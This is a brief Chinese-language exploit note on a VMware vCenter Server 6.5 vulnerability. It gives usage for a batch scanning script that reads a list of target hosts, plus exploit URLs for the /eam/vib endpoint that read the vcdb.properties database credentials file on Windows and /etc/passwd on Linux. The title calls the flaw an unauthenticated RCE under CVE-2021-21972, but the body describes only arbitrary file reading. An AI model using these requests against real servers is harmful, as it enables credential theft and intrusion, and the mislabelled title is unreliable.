VMware vCenter Server未授权RCE漏洞(CVE 2021 21972)
漏洞概述¶
VMware vCenter特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件
影响范围¶
VMware vCenter Server 6.5.0a- f 版本
POC¶
urls.txt用于存放目标HOST,然后直接运行此脚本即可 python vCenter-info-leak.py
漏洞验证成功的目标存放于success.txt,连接失败的错误信息存放于error.txt中
EXP¶
Windows主机
http://xxx.xxx.xxx.xxx/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
Linux主机
https://xxx.xxx.xxx.xxx/eam/vib?id=/etc/passwd